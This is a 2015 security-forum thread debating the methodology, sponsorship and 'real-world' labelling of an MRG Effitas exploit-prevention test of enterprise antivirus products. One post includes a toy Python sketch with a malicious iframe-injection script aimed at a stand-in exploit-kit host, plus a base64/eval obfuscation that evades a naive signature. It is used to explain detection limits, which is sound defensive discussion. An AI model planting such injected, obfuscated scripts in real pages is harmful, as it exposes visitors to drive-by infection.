MRG Effitas Real World Enterprise Security Exploit Prevention Test March 2015

Discussion in 'other anti-malware software' started by FleischmannTV, Apr 24, 2015.

  1. ropchain

    ropchain Registered Member

    Joined:
    Mar 26, 2015
    Posts:
    335
    1. I have *never* made any statement about the difficulty of finding vulnerabilities.
    2. My statement was meant to indicate that your statement about the bug bounty and Chrome exploits in the wild is not based on facts, and it can't be deduced from any data that the Chromium bug bounty program is preventing ITW 0-days.

    Kees, I have to say that you're jumping to conclusions pretty quickly in certain situations.
     
  2. First, it is not caused by the bug bounty program alone; I agree on that. Have you read about automated testing at Google? How large and well catalogued their reusable set of code and (regression) test sets is? Google's number of bugs per 1,000 lines of code (KLOC) is 1/3 of the industry average and half that of their largest competitors (Microsoft and Apple).

    Second, all publicly available data I could find shows that the publication date of a vulnerability is the same date on which Google released a new version that closed that vulnerability. Maybe you could point out a Chrome ITW exploit from the last five years?
     
    Last edited by a moderator: Apr 29, 2015
  3. RJK3

    RJK3 Registered Member

    Joined:
    Apr 4, 2011
    Posts:
    862
    I believe there are some valuable insights for anyone who doesn't dismiss the test out of hand for superficial reasons, such as who sponsored it. Not all of the results are as in favour of Kaspersky as one might expect.

    Firstly, I like that they broke down exactly how these solutions prevented infection by layer:
    Anti-Exploit:
    Whether or not people agree with sponsored tests in general, I think it's pretty clear that the anti-exploit module in Kaspersky is quite decent, as the AE-only comparison test shows.

    Relying on Anti-Exploit is not ideal:

    I also liked that they addressed the risk of blocking an exploit later in the chain, as malicious shellcode can still run and perform other functions - something which is increasingly important with the move by exploit kits towards fileless malware. For this reason, relying on exploit protection is not ideal from an information security perspective, even if overall it's still a good way to prevent a persistent infection.

    Exploit protection is critical, but to me late-chain exploit protection is the equivalent of a behaviour blocker when it comes to preventing information leaks. A breach has already been made.

    Script blocking:
    If you prefer the concept of blocking exploits before they run, i.e. by recognising malicious scripts, then this test actually suggests that Symantec and Sophos are well ahead of the other solutions, including Kaspersky, in this regard. This is the ideal level at which to block an exploit, IMO. It's also easier said than done, due to obfuscation techniques.
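    To make the obfuscation point concrete, here is a toy Python sketch (the "signature", script and URL are invented for illustration, not taken from the test or from any vendor's engine): a naive static pattern match catches the plain script, but misses the same payload once it is base64-packed behind an eval.

    import base64

    # Naive static "signature" (hypothetical) that a scanner might look for:
    SIGNATURE = "document.write('<iframe"

    plain_script = "document.write('<iframe src=\"http://bad.example/ek\"></iframe>');"

    # Same behaviour, trivially obfuscated: base64-packed and unpacked at runtime via eval()/atob().
    packed = base64.b64encode(plain_script.encode()).decode()
    obfuscated_script = "eval(atob('" + packed + "'));"

    def naive_scan(script_text):
        # True if the static signature appears verbatim in the script text.
        return SIGNATURE in script_text

    print(naive_scan(plain_script))       # True  -> caught
    print(naive_scan(obfuscated_script))  # False -> slips past a purely static check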

    Sophos'/Symantec's script blocking in combination with EMET/MBAE/HMPA + AppLocker or a software policy would likely be a pretty powerful combination.

    Still, given that the script blocking from Kaspersky detected the majority of exploits that evaded URL blocking, I think it would actually be more valuable to see Kaspersky's script-blocking layer in isolation than their AE module.

    URL blocking or signature detection are unreliable:
    Trend Micro seem to rely mainly on their URL filtering. While their URL blocking is impressive, unlike Kaspersky they fail in the majority of cases where sites aren't blocked. It would be interesting to see how Trend would perform with the URL-blocking component disabled. Similarly, McAfee and Microsoft appear to rely mostly on their signature detections, and this is reflected in their overall poor performance.

    Flash the main target of exploit kits:
    Lastly, it's interesting to note that Adobe Flash appears to be the main browser plugin targeted by exploit kits these days, compared to circa 2012 when it was Java.
     
  4. RJK3

    RJK3 Registered Member

    Joined:
    Apr 4, 2011
    Posts:
    862
    I don't personally know if there are ITW Chrome exploits, but I have seen stats pages from some exploit kits showing a significant number of "loads" for the Chrome browser. The question is how valid these stats are, i.e. whether they measure what they claim to measure.
     
  5. FleischmannTV

    FleischmannTV Registered Member

    Joined:
    Apr 7, 2013
    Posts:
    1,094
    Location:
    Germany
    Yes, that was very illuminating.

    I think I have to disagree with you there slightly. While the test shows Symantec to be excellent at blocking malicious scripts, one has to account for how they do it technically and the limitations of that approach as well. As far as I know, Symantec either detects these scripts at the network level or injects a monitoring DLL into the browser (Firefox).

    The former will probably be ineffective against secure connections, which gives reason for concern in light of the fact that advertising, and malvertising with it, will soon move to secure connections. The latter will probably still work with secure connections, yet I have only observed this particular module in 32-bit Firefox, whereas 64-bit IE and Chrome only have a website-blocking toolbar. With Chrome I am not worried, but IE should definitely be covered.
     
  6. RJK3

    RJK3 Registered Member

    Joined:
    Apr 4, 2011
    Posts:
    862
    That's a fair point, and something I'll need to educate myself on.

    I was working on a different assumption, based on how MRG defined script blocking for the test:

    The scenario in which a trusted website is hacked and obfuscated code added is more important to me.

    Personally I'm not worried in the slightest about advertising being used to deliver malware, given how readily available tools and lists for blocking advertising wholesale are - but consider your point made.
     
  7. RJK3

    RJK3 Registered Member

    Joined:
    Apr 4, 2011
    Posts:
    862
  8. ropchain

    ropchain Registered Member

    Joined:
    Mar 26, 2015
    Posts:
    335
    VUPEN? ;)
    http://www.zdnet.com/article/pwn2own-2012-google-chrome-browser-sandbox-first-to-fall/

    Another point:
    How many known Firefox or Safari zero-days have been used ITW in the past few years?
     
  9. Minimalist

    Minimalist Registered Member

    Joined:
    Jan 6, 2014
    Posts:
    14,881
    Location:
    Slovenia, EU
    Hm, that's a good question. I mostly remember reports of IE exploits being used ITW...
     
  10. ropchain

    ropchain Registered Member

    Joined:
    Mar 26, 2015
    Posts:
    335
    Don't forget Flash, Adobe Reader and MS Office ;)
     
  11. RJK3

    RJK3 Registered Member

    Joined:
    Apr 4, 2011
    Posts:
    862
    Pretty sure he's talking in the context of browser-specific exploits ITW.
     
  12. Minimalist

    Minimalist Registered Member

    Joined:
    Jan 6, 2014
    Posts:
    14,881
    Location:
    Slovenia, EU
    As I remember there were some Flash and Office exploits used ITW not long ago. But I'm too lazy to find them :)
     
  13. No, Pwn2Own is a bug bounty sponsored by Google. Now you are confirming my first post :)
     
  14. TonyW

    TonyW Registered Member

    Joined:
    Oct 12, 2005
    Posts:
    2,741
    Location:
    UK
  15. ropchain

    ropchain Registered Member

    Joined:
    Mar 26, 2015
    Posts:
    335
    Pwn2Own 2012 was different; participants were *not* required to hand over their exploits. ;)
     
  16. Zoltan_MRG

    Zoltan_MRG Registered Member

    Joined:
    Apr 9, 2015
    Posts:
    31

    Some exploit samples targeted Silverlight in Chrome, others Flash in Firefox. This means that running a non-IE browser with a vulnerable plugin (Flash, Silverlight) is still a risk.


    No.

    As in all other tests, we and the vendor created the list of products to be tested based on market share and relevance. Please note this is an enterprise test.
    About the artificial test, we still have not seen a single valid argument why the test is not OK on a technical level. We shared all the details; it is a 100% transparent test. Also, every vendor received the code for free, so everyone can improve their product.

    We are a UK-based company.
     
  17. Well, "OK on a technical level" is a nicely self-interpretable condition.

    It is not the technical validity, but the validity of the origin that is questionable.
    IMO a testing organisation should not use the (artificial) tests of a sponsor. But let's agree to disagree on that.

    It is not the technical validity, but the validity of calling artificial tests real-world tests.
    It remains hilarious that the same testing organisation has two (IMO contradictory) qualifications for real-world protection tests in regard to anti-exploit testing: artificial tests supplied by the sponsor on one occasion versus real-world exploits found in the wild a few weeks later, and both are called real-world protection tests.

    It is not the technical validity, but the validity of the success/fail condition that is questionable.
    See the security expert's comment.
     
    Last edited by a moderator: Apr 30, 2015
  18. As to market share, OPSWAT claims that 2/3 of the data is collected from corporate users, and Avast is listed second.

    As to relevance, this is what a security expert comments on your criteria:
     
  19. SLE

    SLE Registered Member

    Joined:
    Jun 30, 2011
    Posts:
    361
    Of course such things are hard to test and catch. But at the very first level the "test setting" was: old third-party software, disabled Windows updates (OS not up to date, etc.). I know that otherwise it would be hard to test exploits.

    BUT: even at this point, of course, all of this is artificial and has nothing to do with the real world! So why call it real world? It's just misleading.
     
  20. ropchain

    ropchain Registered Member

    Joined:
    Mar 26, 2015
    Posts:
    335
    Do you even know how exploits work?
    1. There is no difference between using one-days or zero-days; the only difference is the existence of a patch, that's it.
    2. Testing security solutions against EKs is not 'artificial'.
    3. Almost all exploits use the same techniques that are also used in the one 'artificial' test of HMPA.
    4. Buying multiple zero-day exploits would cost you half a million bucks, and in that case MRG Effitas would be criticized by the entire industry for supporting companies like Netragard and Beyond Security.
     
  21. SLE

    SLE Registered Member

    Joined:
    Jun 30, 2011
    Posts:
    361
    I know all of that and I'm with you on those 4 points. That's why I clearly wrote: otherwise hard to test ;)

    But why call such a setting real world? It's not necessary to call it so; it's just an exploit test, an approach, and far from real-world testing. And if it's not real world, it's artificial, like many other tests. That's all - word play :)

    Besides that: this exploit test is much better than the one MRG did for SurfRight.
     
  22. 2. We are not talking about the EK tests. MRG called the tests from page 35 onward of the HMPA report artificial; those are the artificial tests we are talking about. MRG called them artificial, so when you disagree, start a discussion with Zoltan, not me.

    3. Disagree; read page 35 and onwards of the HMPA test.
    "In order to generate the correct shellcode", really? Only Firefox, due to the lack of a low-rights sandbox, allows side-by-side intrusion by medium integrity level (IL) processes. Still not artificial? Then read that the rest of this artificial test scenario is based on an exploit closed in 2011! I rest my :'( and :blink:
     
    Last edited by a moderator: Apr 30, 2015
  23. Zoltan_MRG

    Zoltan_MRG Registered Member

    Joined:
    Apr 9, 2015
    Posts:
    31
    As I am answering multiple posts, please forgive me for not using the proper "reply"/"quote" method.

    First of all, I'm confused. Most of the questions in this thread are about the other report.

    2. Why is the HitmanPro test called a real-world test? The whole report is divided into three sections: product assessment, product comparison (real-world exploit tests), and artificial zero-day test. Because we believe the most important part of the whole report is the product comparison test, we named the report after that section. If you can propose a better title for the report, let us know; we are interested.

    3. Artificial zero-day test in the HitmanPro test: if someone is not interested in the results where the vendor provided the code, that is OK. As you can see, the results are split into two columns. Just cover the column you are not interested in and look at the report that way. It is important to see that the exploit we wrote internally bypassed all but two security products with default settings (EMET only blocked the attack when it was configured to protect the Firefox browser). And it is pretty bad that people are focusing on why the second test is not valid, rather than demanding that every AV include a proactive exploit protection module.

    4. "Executable has to run to generate the correct shellcode ... " (Hitmanpro test) : Already answered multiple times, check the original thread. Also as in the original document it was stated "In a real world scenario, the offset can be leaked first to the attacker, and the attacker can dynamically compile the shellcode based on this information – similar to the Metasploit ms13_037_svg_dashstyle module."

    5. Test with a vulnerability patched in 2011: I'm lost, which vulnerability are you referring to? The artificial zero-day exploit has nothing to do with any known vulnerabilities at all. Anyway, if you have seen enterprise patch levels, you would know that seeing 10-year-old unpatched vulnerabilities on an enterprise network is totally common. Java 6 is still common. Old Flash Player versions which are not upgraded because of a lack of admin privileges are common. And guess what, IT administrators still love Firefox, so they use it at enterprises. This whole test is almost equal to a new Flash zero-day, because we are talking about a plugin running inside a browser.

    6. Why is Avast not included in the Kaspersky (enterprise security) report: let's analyze the market share link you provided. 2/3 of the protections are corporate users, and 13.2% is avast! Free Antivirus. What do you think, what percentage of avast! Free Antivirus is used at enterprises, when it has no enterprise support at all? I don't know its actual license, but it might be forbidden for business use altogether. This is a totally different product market than Kaspersky Enterprise Security. If you are interested in a test where avast! Free is included along with all enterprise products, you have two options: do it yourself, or pay someone to do it for you. No one will stop you.

    7. Why is vendor XY included (in the HitmanPro report) when they don't provide exploit protection? Most products tested don't have a specific anti-exploit module, but are still sold and marketed as a "kick-ass" solution to protect against malicious code. Based on the results, most of these products don't do what they promise. Protecting against the prevalent Angler exploit kit, with its ever-changing URLs and in-memory malware, is almost impossible with traditional AV components. And yes, if the in-memory component drops additional malware for other tasks, it might get blocked, but isn't it too late by then?

    8. Why is behavior blocking not counted as a pass? Already answered; see the original thread. Additional information: at an enterprise level, whenever malware is blocked via a behavior component (or a scheduled scan), an organization that cares about security should do a proper forensic investigation to establish what happened between the time the malware started and the time it was blocked by behavior protection. Even if nothing happened, this could cost a lot, even if we are talking about a single computer. If something bad happened (e.g. data exfiltration), it is definitely a huge problem (and could not be considered a "pass"). Most organisations lack the skill to do a proper forensic analysis, and hiring someone to do that is expensive. I know, because I had this job for years.
     
  24. Is that an opinion or a fact? You make IT administrators look like incompetent people. What a disappointing, libellous answer.

    So to your knowledge, "anti-exploit" and "protect against malicious code" are the same? A disappointing answer (especially when you speak so lowly of IT admins); I would have expected you to have some basic knowledge of IT-industry terminology.

    So to your knowledge, Avast does not have an enterprise solution? A disappointing answer (especially when you speak so lowly of IT admins); I would have expected you to have some basic knowledge of the IT market.

    Let me use your own answer :argh: You have two options: do the research yourself or pay someone to do it for you.
     
    Last edited by a moderator: May 3, 2015
  25. Well, I did a small personal test of this with AVG LinkScanner: see https://www.wilderssecurity.com/threads/anti-exploit-testing.368806/

    Using a database from 2013, it still blocked 75% of the exploits in 2015. This is in line with research published by AV companies showing that 60-75% of the exploits used in exploit kits are over two years old. They also said that 90% to 95% of exploit attacks use one of the top 20 exploits. Using these findings, AVs should be able to protect against at least 60 to 75 percent of the exploits.

    This deduction is congruent with the results of your own research (have a look at page 5 of the Kaspersky-sponsored test): even Microsoft stopped over half of the exploits, and all others scored above 75%. So your claim that it is impossible to protect with traditional components contradicts these findings. Please remember that real-life risk = exposure risk x no-protection risk.
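    As a rough, back-of-the-envelope illustration of that formula (the numbers below are made up purely for the sake of the example, not taken from the report or my LinkScanner test):

    # real-life risk = exposure risk x no-protection risk (illustrative numbers only)

    def residual_risk(exposure_risk, block_rate):
        # Chance of actually being compromised: exposure times the fraction NOT blocked.
        return exposure_risk * (1.0 - block_rate)

    exposure_risk = 0.10   # assumed: 10% chance of ever landing on an exploit kit page
    block_rate    = 0.75   # assumed: an AV that stops ~75% of kit exploits (mostly old ones)

    print(round(residual_risk(exposure_risk, block_rate), 3))   # 0.025, i.e. 2.5% real-life risk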
     
    Last edited by a moderator: May 2, 2015